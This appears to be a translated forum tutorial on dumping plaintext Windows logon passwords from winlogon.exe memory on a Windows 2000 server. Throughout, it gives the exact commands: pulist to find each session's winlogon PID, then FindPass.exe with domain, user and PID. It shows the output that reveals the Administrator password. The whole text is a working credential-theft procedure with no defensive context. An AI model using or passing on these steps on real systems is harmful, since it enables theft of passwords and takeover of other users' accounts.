1. First, use pulist to view the logon domain information
C:\Documents and Settings\bingle>pulist

Process PID User
Idle 0
System 8
smss.exe 164 NT AUTHORITY\SYSTEM
csrss.exe 192 NT AUTHORITY\SYSTEM
winlogon.exe 188 NT AUTHORITY\SYSTEM
wins.exe 1212 NT AUTHORITY\SYSTEM
Explorer.exe 388 TEST-2KSERVER\Administrator
internat.exe 1828 TEST-2KSERVER\Administrator
conime.exe 1868 TEST-2KSERVER\Administrator
msiexec.exe 1904 NT AUTHORITY\SYSTEM
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM
taskmgr.exe 1752 TEST-2KSERVER\Administrator
csrss.exe 2056 NT AUTHORITY\SYSTEM
winlogon.exe 2416 NT AUTHORITY\SYSTEM
rdpclip.exe 2448 TEST-2KSERVER\clovea
Explorer.exe 2408 TEST-2KSERVER\clovea
internat.exe 1480 TEST-2KSERVER\clovea
cmd.exe 2508 TEST-2KSERVER\Administrator
ntshell.exe 368 TEST-2KSERVER\Administrator
ntshell.exe 1548 TEST-2KSERVER\Administrator
ntshell.exe 1504 TEST-2KSERVER\Administrator
csrss.exe 1088 NT AUTHORITY\SYSTEM
winlogon.exe 1876 NT AUTHORITY\SYSTEM
rdpclip.exe 1680 TEST-2KSERVER\bingle
Explorer.exe 2244 TEST-2KSERVER\bingle
conime.exe 2288 TEST-2KSERVER\bingle
internat.exe 1592 TEST-2KSERVER\bingle
cmd.exe 1692 TEST-2KSERVER\bingle
mdm.exe 2476 TEST-2KSERVER\bingle
taskmgr.exe 752 TEST-2KSERVER\bingle
pulist.exe 2532 TEST-2KSERVER\bingle

The three winlogon.exe entries (marked in red in the original post) belong to the Administrator, clovea and bingle sessions respectively, and their PIDs are the winlogon PIDs for those three users.

Once you know the PID, move on to the next step:

2. Use FindPass to obtain the password

Syntax: findpass.exe [DomainName] [UserName] [PID-of-WinLogon]

[DomainName]: the domain name before the backslash in the User column of the listing above, e.g. TEST-2KSERVER
[UserName]: the account whose password is to be retrieved, e.g. Administrator or bingle
[PID-of-WinLogon]: the matching winlogon PID found in the listing above

Example:

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER administrator 188

To Find Password in the Winlogon process
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.
The WinLogon process id is 188 (0x000000bc).
To find TEST-2KSERVER\administrator password in process 188 ...
The encoded password is found at 0x008e0800 and has a length of 10.
The logon information is:
TEST-2KSERVER/administrator/testserver.
The hash byte is: 0x13.

oh.yeah..................

The three values marked in red are the domain name, the account name and the password respectively, that is:
Domain: TEST-2KSERVER
Account: administrator
Password: testserver